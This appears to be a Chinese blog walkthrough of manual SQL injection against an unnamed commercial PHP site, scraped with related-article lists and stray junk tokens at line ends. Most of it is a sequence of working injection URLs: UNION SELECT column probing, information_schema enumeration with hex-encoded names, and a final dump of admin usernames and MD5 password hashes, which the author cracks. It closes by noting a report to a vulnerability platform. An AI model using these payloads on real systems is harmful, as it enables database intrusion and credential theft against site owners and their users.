纯手工注入
开门见山
扫到一个站存在SQL注入,放到阿D、明小子上猜解失败,欲放弃,忽然打算试一下手工注入。php
1. 验证是否可注入编码
http://www.xxx.com.cn/product-detail.php?pid=21’ spa
再用 and 1=1和 and 1=2验证3d
肯定有注入orm
2. 猜字段blog
http://www.xxx.com.cn/product-detail.php?pid=21 order by 37 正常页面ip
http://www.xxx.com.cn/product-detail.php?pid=21 order by 38 报错页面io
字段数为37table
3. 暴出字段位置form
http://www.xxx.com.cn/product-detail.php?pid=21 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
4. 暴库和管理员信息
http://www.xxx.com.cn/product-detail.php?pid=21 UNION SELECT 1,2,3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
获得库名和管理员信息
5. 列当前库的表名
库名的十六进制编码 0x736565xxxxxx6E67
http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,group_concat(table_name),3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.tables where table_schema=0x736565xxxxxx6E67
表名太多用审核元素列开查看
猜测 admin 或者 admin_login 多是存放管理员帐号与密码的表
6. 在第17个字段暴出admin_login表的字段
admin_login 十六进制编码 0x61646D696Exxxxxxxx696E
http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,group_concat(table_name),3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,group_concat(column_name),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.columns where table_name=0x61646D696Exxxxxxxx696E
字段 id,username,ip,ctime,id,ip,ctime,username
7. 再在第17个字段暴出admin表的字段
admin 十六进制编码 0x61646xxx6E
http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,group_concat(table_name),3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,group_concat(column_name),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.columns where table_name=0x61646xxx6E
审核元素列开查看
admin表的字段:id,username,password,ctime,logintime,loginsum,id,username,password,permission,ctime,logintime,loginsum
8. 暴出字段内容
0x3a 的十六进制是 : 用来分隔字段内容
http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,2,3,4,5,6,7,8,user(),10,11,database(),13,14,15,group_concat(username,0x3a,password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from admin
获得字段内容,也就是管理员登陆帐号
使用MD5解密
9. 提交补天漏洞平台
不到一周,获得厂商回复和确定。
- 1. 简单的sql注入之2 / writeup (手工注入,纯属练手)
- 2. Mysql手工注入
- 3. 手工注入 mutillidae
- 4. access手工注入
- 5. sql手工注入
- 6. SQL手工注入
- 7. Access手工注入
- 8. mssql手工注入
- 9. 一次简单的纯手工显错注入
- 10. 手工注入——access手工注入实战和分析
- 更多相关文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依赖注入)的实现方式:属性注入和构造注入 - Spring教程
- • PHP开发工具
- • YAML 入门教程
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. eclipse设置粘贴字符串自动转义
- 2. android客户端学习-启动模拟器异常Emulator: failed to initialize HAX: Invalid argument
- 3. android.view.InflateException: class com.jpardogo.listbuddies.lib.views.ListBuddiesLayout问题
- 4. MYSQL8.0数据库恢复 MYSQL8.0ibd数据恢复 MYSQL8.0恢复数据库
- 5. 你本是一个肉体,是什么驱使你前行【1】
- 6. 2018.04.30
- 7. 2018.04.30
- 8. 你本是一个肉体,是什么驱使你前行【3】
- 9. 你本是一个肉体,是什么驱使你前行【2】
- 10. 【资讯】LocalBitcoins达到每周交易比特币的7年低点
- 1. 简单的sql注入之2 / writeup (手工注入,纯属练手)
- 2. Mysql手工注入
- 3. 手工注入 mutillidae
- 4. access手工注入
- 5. sql手工注入
- 6. SQL手工注入
- 7. Access手工注入
- 8. mssql手工注入
- 9. 一次简单的纯手工显错注入
- 10. 手工注入——access手工注入实战和分析